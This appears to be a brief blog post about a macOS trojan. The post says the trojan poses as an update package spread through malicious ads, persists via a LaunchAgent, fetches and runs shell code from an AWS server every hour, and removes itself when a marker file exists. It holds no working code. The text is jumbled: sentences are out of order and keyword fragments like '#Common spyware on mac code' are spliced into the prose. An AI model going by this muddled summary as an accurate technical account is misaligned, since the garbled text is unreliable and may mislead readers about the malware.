The idea is that at some point in the future the malware will get a command telling it to download the actual payload and then execute it. That means whatever commands the attackers put onto the server all the infected machines will download and execute. #Common spyware on mac codeWhen on a machine it downloads a file from an AWS hosted server every hour and then runs arbitrary shell code based on the contents. In terms of what it's doing on an actual machine it's anything but stealthy and really uses a lot of well known malware techniques such as creating a launchagent which will reliably start its process when the machine boots. Either way the fact that even analyzing it there's no way to know what is end goal is combined with its ability to delete itself has lead malware researchers to conclude it's attempting to conceal its actual malicious package. This could have been a way for the attacker to prevent their own systems from being infected while testing or it could be something core to the function of the malware which attempts to avoid infecting machines after it's already run its course. If the malware detects a file called ~/Library/._insu it uninstalls itself automatically. The reason it's considered "high stealth" is mainly because it doesn't include its final payload and contains the means to delete itself. The ad might say something like, "Cannot display this content as your version of xyz is out of date, click here to update." and then the user unwittingly downloads the malware onto their machine. #Common spyware on mac updateFrom an analysis done by Red Canary the trojan appears to the user as update.pkg or updater.pkg and masquerades as a software update using malicious advertisements. To give more information because this article is very lacking.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |